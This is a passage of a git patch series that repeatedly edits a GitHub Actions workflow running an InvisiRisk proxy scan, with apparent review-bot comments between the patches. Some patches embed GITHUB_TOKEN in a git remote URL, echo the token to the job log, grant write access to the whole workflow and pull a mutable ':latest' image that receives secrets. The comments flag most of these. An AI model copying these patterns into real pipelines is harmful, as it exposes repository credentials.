From 69cb3f325ce58cead43d9185742b92e41fb44718 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 24 Jan 2025 15:46:30 +0545 Subject: [PATCH 01/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 9d57c51..e16f441 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -59,7 +59,7 @@ jobs: needs: [create_scan_in_IR_Portal, ecr_details] services: pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test + image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} From e420bdad99b0a701955a05c08ec710cba6168854 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 24 Jan 2025 15:47:58 +0545 Subject: [PATCH 02/89] Update main.yml From e728fea3385459022ceb9454a55132c02a04b789 Mon Sep 17 00:00:00 2001 From: ir-ashraya-tuladhar Date: Fri, 24 Jan 2025 18:38:47 +0545 Subject: [PATCH 03/89] Update package.json --- package.json | 29 +++++++++++++++-------------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/package.json b/package.json index 9507c1b..e833609 100644 --- a/package.json +++ b/package.json 
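Review bot: The `pse` service image moves from `:dev-test` to `:latest`, a mutable tag, so every run pulls whatever was last pushed to that ECR repository and no change shows up in this file when the image changes. Later patches in this series appear to hand this same service `INVISIRISK_JWT_TOKEN` and `GITHUB_TOKEN` through its `env`, so the exact image that runs decides where those tokens go. Pin an immutable reference instead, e.g. `image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy@sha256:<digest>` (placeholder; take the digest from the registry), and bump it in a reviewed commit. The `services` block starts and ends outside the hunk.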
@@ -1,23 +1,24 @@ { - "name": "GeeksForGeeks", + "name": "test-js-repo", "version": "1.0.0", - "description": "GeeksForGeeks", + "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"test started \"", - "start": "node start.js" + "test": "echo \"Test is successful \" && exit 0" }, - "engines": { - "node": ">=7.6.0", - "npm": ">=4.1.2" + "repository": { + "type": "git", + "url": "git+https://github.com/ashokkasti/test-js-repo.git" }, - "author": "GeeksForGeeks", - "license": "ISC", + "author": "Ashok Kasti", + "license": "MIT", + "bugs": { + "url": "https://github.com/ashokkasti/test-js-repo/issues" + }, + "homepage": "https://github.com/ashokkasti/test-js-repo#readme", "dependencies": { - "body-parser": "^1.17.1", - "express": "^4.15.2", - "express-validator": "^3.1.2", - "mongoose": "^4.8.7", - "nodemon": "^1.14.12" + "array-first": "^1.0.2", + "array-last": "^1.3.0", + "is-sorted": "^1.0.5" } } From 0ffa9c1e770279bbe55a12ad871313d3fcdfe071 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 15:28:34 +0545 Subject: [PATCH 04/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index e16f441..cde457d 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -11,7 +11,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.audit.dev.invisirisk.com + API_URL: https://app.stage.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -67,7 +67,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.audit.dev.invisirisk.com/ + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 90a260b013a9258723d5324ab8b91c7673389d2d Mon Sep 17 00:00:00 2001 
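Review bot: The `dependencies` block is replaced wholesale (`array-first`, `array-last`, `is-sorted` instead of the express/mongoose set), but the diffstat lists only `package.json`, so no lockfile changes with it. The workflow in this series runs `npm ci`, which installs strictly from `package-lock.json` and errors out when it disagrees with `package.json`; if a lockfile exists in the repository, regenerate it and commit it in the same change. With caret ranges such as `^1.0.2` and no lockfile in the commit, the workflow's `npm install` step resolves versions at build time rather than from a reviewed set. The removal of `"start"` and `"engines"` is not mentioned in the commit message and deserves a line there if it is intentional.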
From: ir-paras-oli Date: Mon, 27 Jan 2025 15:55:59 +0545 Subject: [PATCH 05/89] Update main.yml --- .github/workflows/main.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index cde457d..909e971 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -90,6 +90,7 @@ jobs: with: node-version: ${{ matrix.node-version }} - run: npm install + - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From bf71648c1ac5377d9e2400ab60b7b4fc1089b39f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 17:14:04 +0545 Subject: [PATCH 06/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 909e971..cba3599 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -11,7 +11,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.stage.invisirisk.com + API_URL: https://app.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -67,7 +67,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + INVISIRISK_PORTAL: https://app.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 538394c623bfd834d7234d3a031058d2ccd2ad56 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 17:26:24 +0545 Subject: [PATCH 07/89] Update main.yml From ed88bdd27d38f1d6dbdaaf6b2b90627f050ff047 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 17:31:26 +0545 Subject: [PATCH 08/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index cba3599..ac3b32f 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
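Review bot: The added `- run: git push` has no `name`, no comment and nothing to push: no earlier step creates a commit, and the workflow-level `permissions` visible in the neighbouring patches grant `contents: read` only. As written it is either a no-op or a failing step, and a build job that pushes on every `push` and `pull_request` run needs its reason stated in the file. If the step is there on purpose (for example to generate git traffic for the proxy), give it a `name` and a comment such as `# intentional: expected to push nothing`; otherwise remove it. The same bare step is re-added in PATCH 09, 12 and 15, and the `steps` list starts and ends outside the hunk.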
@@ -90,7 +90,7 @@ jobs: with: node-version: ${{ matrix.node-version }} - run: npm install - - run: git push + # - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From c4272098d5453f2a490ecab6332e3ef27baebfce Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:31:23 +0545 Subject: [PATCH 09/89] Update main.yml --- .github/workflows/main.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index ac3b32f..909e971 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -11,7 +11,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.invisirisk.com + API_URL: https://app.stage.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -67,7 +67,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.invisirisk.com/ + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine @@ -90,7 +90,7 @@ jobs: with: node-version: ${{ matrix.node-version }} - run: npm install - # - run: git push + - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From 84bd37fd228ed121bff17e6e89210ee47a58ff46 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:33:04 +0545 Subject: [PATCH 10/89] Update main.ym From bd3e80d91beb922c4882643263404356a6635c1c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:38:41 +0545 Subject: [PATCH 11/89] Update main.yml --- .github/workflows/main.yml | 36 ++++++++++++++++++++++++++++++------ 1 file changed, 30 insertions(+), 6 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 909e971..f9c50fa 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
@@ -1,18 +1,15 @@ - name: Build NPM Package on: push: branches: [ main ] pull_request: branches: [ main ] - permissions: checks: write - contents: read + contents: write packages: read env: API_URL: https://app.stage.invisirisk.com - jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -85,13 +82,40 @@ jobs: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - name: Checkout the code uses: actions/checkout@v3 + with: + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} + - name: Setup Git Safe Directory + run: | + git config --global --add safe.directory /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript + - name: Configure Git + run: | + git config --global user.name "github-actions[bot]" + git config --global user.email "github-actions[bot]@users.noreply.github.com" + git config --global core.protectNTFS false - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - run: npm install - - run: git push + - name: Commit and Push Changes + run: | + # Ensure we're in the right directory + cd /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript + + # Configure Git authentication + git remote set-url origin https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git + + # Add and commit changes if any exist + git add . + if git diff --cached --quiet; then + echo "No changes to commit" + else + git commit -m "chore: update build artifacts [skip ci]" + git push origin HEAD:${GITHUB_REF#refs/heads/} + fi + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: npm ci - run: npm run build --if-present - run: npm test - From c9ee150ebe116c5d73ba698cd2e2da4ee5080548 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:40:00 +0545 Subject: [PATCH 12/89] Update main.yml --- .github/workflows/main.yml | 34 ++++------------------------------ 1 file changed, 4 insertions(+), 30 deletions(-) 
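Review bot: `contents: write` is set in the workflow-level `permissions` block, so all three jobs (`create_scan_in_IR_Portal`, `ecr_details`, `start_proxy_and_build`) and every `pull_request` run receive a token that can write to the repository, although only the commit-and-push step needs it. Keep `contents: read` at the top and add a job-level `permissions:` block with `contents: write` under `start_proxy_and_build`, listing the other scopes that job needs because a job-level block replaces the workflow one. The same workflow-wide grant returns in PATCH 13, 14, 18 and 19.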
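Review bot: `git remote set-url origin https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git` embeds the token in the remote URL, which git stores in `.git/config` and can repeat in `git remote -v` output and error messages while `npm ci`, `npm run build` and `npm test` still run afterwards. `actions/checkout` is already given `token:` in this hunk and by default leaves that credential configured for `origin`, so the `set-url` line can be dropped. `git config --global core.protectNTFS false` switches off one of git's path-safety checks with no stated reason and should go unless a concrete failure requires it. The push step needs `if: github.event_name == 'push'`, because on `pull_request` runs `GITHUB_REF` is `refs/pull/<n>/merge` and `${GITHUB_REF#refs/heads/}` leaves it unchanged, and the hard-coded `/__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript` is better written as `"${GITHUB_WORKSPACE}"`. PATCH 18 and PATCH 19 repeat the token-in-URL pattern with `secrets.PAT` and `secrets.GITHUB_TOKEN`.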
diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f9c50fa..15181a3 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -4,12 +4,14 @@ on: branches: [ main ] pull_request: branches: [ main ] + permissions: checks: write - contents: write + contents: read packages: read env: API_URL: https://app.stage.invisirisk.com + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -82,40 +84,12 @@ jobs: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - name: Checkout the code uses: actions/checkout@v3 - with: - fetch-depth: 0 - token: ${{ secrets.GITHUB_TOKEN }} - - name: Setup Git Safe Directory - run: | - git config --global --add safe.directory /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript - - name: Configure Git - run: | - git config --global user.name "github-actions[bot]" - git config --global user.email "github-actions[bot]@users.noreply.github.com" - git config --global core.protectNTFS false - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - run: npm install - - name: Commit and Push Changes - run: | - # Ensure we're in the right directory - cd /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript - - # Configure Git authentication - git remote set-url origin https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git - - # Add and commit changes if any exist - git add . - if git diff --cached --quiet; then - echo "No changes to commit" - else - git commit -m "chore: update build artifacts [skip ci]" - git push origin HEAD:${GITHUB_REF#refs/heads/} - fi - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From b22fcac06f7d142ce5cec7a3534ada89bd6ec2cd Mon Sep 17 00:00:00 2001 
From: ir-paras-oli Date: Wed, 29 Jan 2025 14:30:32 +0545 Subject: [PATCH 13/89] Update main.yml --- .github/workflows/main.yml | 59 ++++++++++++++++++++++++-------------- 1 file changed, 37 insertions(+), 22 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 15181a3..6c039d4 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,17 +1,19 @@ name: Build NPM Package + on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write - contents: read + contents: write # Add write permission for contents packages: read + env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -28,6 +30,7 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: @@ -40,8 +43,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -52,7 +55,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] 
@@ -75,21 +78,33 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: git push - - run: npm ci - - run: npm run build --if-present - - run: npm test + - name: Checkout the code + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + - run: npm ci + - run: npm run build --if-present + - run: npm test + - name: Configure Git + run: | + git config --global user.name "github-actions[bot]" + git config --global user.email "github-actions[bot]@users.noreply.github.com" + - name: Commit and Push Changes + run: | + git add . + git commit -m "Automated build and test updates" + git push origin main + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication From 94fac6afedffb713b2387fa6bfdb4e34a90c3f47 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 14:41:22 +0545 Subject: [PATCH 14/89] Update main.yml --- .github/workflows/main.yml | 22 ++++++++++------------ 1 file changed, 10 insertions(+), 12 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 6c039d4..51478eb 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
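Review bot: `secrets.GITHUB_PAT` cannot resolve as written, because GitHub rejects secret names that begin with `GITHUB_`; the expression evaluates to an empty string and `actions/checkout` gets no usable `token`. Apart from the name, a personal access token passed to checkout stays configured in the workspace while `npm install`, `npm ci`, `npm run build` and `npm test` execute third-party package code, whereas the built-in `GITHUB_TOKEN` with a job-scoped `contents: write` is narrower and expires with the job. `git commit -m "Automated build and test updates"` exits non-zero when nothing is staged, so the step fails on every clean build; guard it with `git diff --cached --quiet || git commit -m "..."`. `git push origin main` also runs on `pull_request` events and should be limited with `if: github.event_name == 'push'`. PATCH 14 keeps the `GITHUB_PAT` reference and PATCH 18 repeats the unguarded commit.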
@@ -8,7 +8,7 @@ on: permissions: checks: write - contents: write # Add write permission for contents + contents: write packages: read env: @@ -78,17 +78,19 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID + - name: Debug Environment Variables + run: | + echo "SCAN_ID: $SCAN_ID" + echo "API_URL: $API_URL" + echo "GITHUB_TOKEN: $GITHUB_TOKEN" - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} + env: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - name: Checkout the code uses: actions/checkout@v3 with: - token: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication + token: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: @@ -97,14 +99,10 @@ jobs: - run: npm ci - run: npm run build --if-present - run: npm test - - name: Configure Git - run: | - git config --global user.name "github-actions[bot]" - git config --global user.email "github-actions[bot]@users.noreply.github.com" - name: Commit and Push Changes run: | git add . git commit -m "Automated build and test updates" git push origin main env: - GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication + GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} From 782e02f2f69050b448d7beb34bc02d02bec4b7ff Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 14:55:08 +0545 Subject: [PATCH 15/89] Update main.yml --- .github/workflows/main.yml | 59 +++++++++++++++----------------------- 1 file changed, 23 insertions(+), 36 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 51478eb..15181a3 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
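Review bot: The new `Debug Environment Variables` step prints `GITHUB_TOKEN: $GITHUB_TOKEN` to the job log; log masking is a safety net rather than a reason to echo a credential, and run logs are visible to everyone who can read the repository's Actions runs. The step declares no `env:`, so `SCAN_ID` is unset here (the `env` that carried it belonged to the step this one replaces) and the output is not useful for debugging either. Print presence rather than value, `echo "GITHUB_TOKEN set: ${GITHUB_TOKEN:+yes}"`, and remove the step once the investigation is over. In the same hunk `invisirisk/pse-action@v1.0.8` changes from `with:` inputs (`github-token`, `SCAN_ID`) to `env:` variables; unless the action reads those environment variables it no longer receives either value, which should be confirmed against the action's declared inputs.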
@@ -1,19 +1,17 @@ name: Build NPM Package - on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write - contents: write + contents: read packages: read - env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -30,7 +28,6 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: runs-on: ubuntu-latest outputs: @@ -43,8 +40,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -55,7 +52,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] 
@@ -78,31 +75,21 @@ jobs: matrix: node-version: [18.x] steps: - - name: Debug Environment Variables - run: | - echo "SCAN_ID: $SCAN_ID" - echo "API_URL: $API_URL" - echo "GITHUB_TOKEN: $GITHUB_TOKEN" - - uses: invisirisk/pse-action@v1.0.8 - env: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout the code - uses: actions/checkout@v3 - with: - token: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: npm ci - - run: npm run build --if-present - - run: npm test - - name: Commit and Push Changes - run: | - git add . - git commit -m "Automated build and test updates" - git push origin main - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + - run: git push + - run: npm ci + - run: npm run build --if-present + - run: npm test From 0c525811c526e62f82e6b4ac668b460dc031cce3 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:05:12 +0545 Subject: [PATCH 16/89] Update main.yml --- .github/workflows/main.yml | 58 ++++++++++++++++++++------------------ 1 file changed, 31 insertions(+), 27 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 15181a3..44ed2ad 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
@@ -1,17 +1,19 @@ name: Build NPM Package + on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write contents: read packages: read + env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -28,6 +30,7 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: @@ -40,8 +43,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -52,7 +55,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -62,12 +65,12 @@ jobs: credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine options: --cap-add=NET_ADMIN 
@@ -75,21 +78,22 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: git push - - run: npm ci - - run: npm run build --if-present - - run: npm test + - name: Checkout the code + uses: actions/checkout@v3 + - name: Configure Git + run: git config --global --add safe.directory "${GITHUB_WORKSPACE}" + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + - run: npm ci + - run: npm run build --if-present + - run: npm test From 1c491a4134a8f685f0832865d789de88e602c09f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:08:32 +0545 Subject: [PATCH 17/89] Update main.yml --- .github/workflows/main.yml | 57 +++++++++++++++++--------------------- 1 file changed, 26 insertions(+), 31 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 44ed2ad..b9feea1 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,19 +1,17 @@ name: Build NPM Package - on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write contents: read packages: read - env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest 
@@ -30,7 +28,6 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: runs-on: ubuntu-latest outputs: @@ -43,8 +40,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -55,7 +52,6 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -65,12 +61,12 @@ jobs: credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: 